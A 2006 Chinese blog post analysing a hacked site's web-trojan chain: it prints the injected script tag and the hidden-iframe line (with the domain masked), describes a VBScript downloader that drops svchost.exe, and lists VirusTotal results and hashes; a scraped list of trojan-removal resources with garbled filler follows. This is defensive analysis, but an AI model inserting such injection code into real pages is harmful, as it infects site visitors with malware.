endurer 原创
2006-09-21 第1版
该网站首页被加入代码:
/--------
<script language="JavaScript" src="hxxp://www***.zhu**jiang***q*h*.com/images/ad.js"></script>
--------/
ad.js 的内容为:
/--------
document.write("<iframe src=hxxp://www***.zhu**jiang***q*h*.com/images/ad***.htm width=0 height=0></iframe>");
--------/
ad***.htm Kaspersky报为:Trojan-Downloader.VBS.Small.av,瑞星报为 Trojan.DL.VBS.Agent.l,其内容为Encode加密的VBScript脚本代码,利用 Microsoft.XMLHTTP 和 Scripting.FileSystemObject 下载文件会下载 hxxp://www***.zhu**jiang***q*h*.com/images/baidu.exe,保存为 %temp%/svchost.exe,并利用Shell.Application 对象 的 ShellExecute 方法 来运行。
baidu.exe 瑞星报为 Trojan.DL.Small.tk。
Complete scanning result of "baidu.exe.del", received in VirusTotal at 09.21.2006, 14:50:42 (CET).
Antivirus |
Version |
Update |
Result |
AntiVir |
7.2.0.16 |
09.21.2006 |
HEUR/Malware |
Authentium |
4.93.8 |
09.21.2006 |
no virus found |
Avast |
4.7.844.0 |
09.19.2006 |
Win32:Tiny-K |
AVG |
386 |
09.20.2006 |
Downloader.Generic.RRD |
BitDefender |
7.2 |
09.21.2006 |
Generic.Malware.dld!!.17ADDB55 |
CAT-QuickHeal |
8.00 |
09.20.2006 |
(Suspicious) - DNAScan |
ClamAV |
devel-20060426 |
09.21.2006 |
no virus found |
DrWeb |
4.33 |
09.21.2006 |
Trojan.DownLoader.4554 |
eTrust-InoculateIT |
23.73.1 |
09.21.2006 |
no virus found |
eTrust-Vet |
30.3.3090 |
09.21.2006 |
no virus found |
Ewido |
4.0 |
09.21.2006 |
no virus found |
Fortinet |
2.82.0.0 |
09.20.2006 |
suspicious |
F-Prot |
3.16f |
09.21.2006 |
no virus found |
F-Prot4 |
4.2.1.29 |
09.21.2006 |
no virus found |
Ikarus |
0.2.65.0 |
09.20.2006 |
no virus found |
Kaspersky |
4.0.2.24 |
09.21.2006 |
Trojan-Downloader.Win32.Tiny.y |
McAfee |
4856 |
09.20.2006 |
no virus found |
Microsoft |
1.1560 |
09.21.2006 |
no virus found |
NOD32v2 |
1.1765 |
09.20.2006 |
a variant of Win32/TrojanDownloader.Tiny.Y |
Norman |
5.90.23 |
09.21.2006 |
W32/Suspicious_U.gen |
Panda |
9.0.0.4 |
09.21.2006 |
Suspicious file |
Sophos |
4.09.0 |
09.21.2006 |
no virus found |
Symantec |
8.0 |
09.21.2006 |
no virus found |
TheHacker |
6.0.1.075 |
09.21.2006 |
no virus found |
UNA |
1.83 |
09.20.2006 |
no virus found |
VBA32 |
3.11.1 |
09.21.2006 |
no virus found |
VirusBuster |
4.3.7:9 |
09.20.2006 |
no virus found |
Aditional Information |
File size: 1416 bytes |
MD5: ad492c5aded7310ee2289838622d5827 |
SHA1: d45b3846691d33cf9374600449688a8c5e2276af |
packers: UPack |
分享到:
相关推荐
五个方面何防止网站被挂木马.php 五个方面何防止网站被挂木马.php
网站数据库被挂js木马.pdf
课程网站数据库被挂js木马.pdf
首先是查杀木马部份,这一部份可以对服务器上已有的网页木马和被挂马的网站进行全面查杀清理。其次是防御木马部份,通过查杀木马部份的清理后,再通过这一部份的实时监控和自动恢复功能,使网站不再受木马侵扰。 ...
木马清道夫木马清道夫木马清道夫木马清道夫木马清道夫木马清道夫木马清道夫木马清道夫木马清道夫木马清道夫木马清道夫木马清道夫木马清道夫木马清道夫木马清道夫木马清道夫木马清道夫木马清道夫木马清道夫木马清道夫...
等待一段时间扫描完了,如果有木马病毒那么就会提示你,列如下图附件.一般描述为: <危险组件,一般被ASP木马利用> 。 为了确认是否木马,点下Edit(编辑).查看内容。系统文件和木马有所不同,相信大家会一眼就能看出。...
云顿基于多年的Web应用安全研究与积累,推出云顿网站木马清理(Eisafe Web ScanCode 简称:Eisafe ScanCode),该软件帮助站长快速扫描网站被入侵后残留的网站木马以及全面检测、实时保护,是网站安全必要基础的安全体系...
网站木马扫描器
一种特殊的被挂Iframe木马的解决方法(图).php
一个金山公司的木马查杀工具! 阿斯顿爱上大
网站被挂马,批量清除木马工具 <div id="top"> 程序处理结果</div> <div id="top_b"> <div> 总文件:<span style="color:red" id="allfile"> 个 替换过文件:<span style="color:red" id="repfile"> 个 ...
我们在用ASP连接数据库开发应用程序时,可能会遇到ASP数据库被挂木马的情况,本文我们就介绍了ASP数据库被挂木马时的编程处理方法,希望会对您有所帮助。
木马克星是一个功能很强的木马专杀工具 木马克星是一个功能很强的木马专杀工具木马克星是一个功能很强的木马专杀工具
主要介绍了php网站被挂木马后的修复方法,总结分析了Linux与Windows系统上木马的查杀方法,并给出了一个完整的木马查找工具实例,需要的朋友可以参考下
木马专杀。各种木马专杀木马专杀。各种木马专杀木马专杀。各种木马专杀木马专杀。各种木马专杀木马专杀。各种木马专杀
本工具可批量查找、替换网页里被挂的木马,也可用于网站文件里指定字符的替换
网站木马清专家》是一款针对网页木马及网站挂马进行查杀与防御的服务器应用软件。软件通过两个步骤可有较提高...2、另外免费和收费的区别就是一个有技术支持一个没有,功能上现在全部一样! 3、本软件需要.Net2.0支持
另外免费和收费的区别就是一个有技术支持一个没有,功能上现在全部一样! 15:57 2010-2-8 1、添加系统不同颜色深度下的界面显示方式; 2、修改软件验证方式,为用户登录验证; 3、网站添加用户购买产品列表并添加前...
网站木马辅助查找器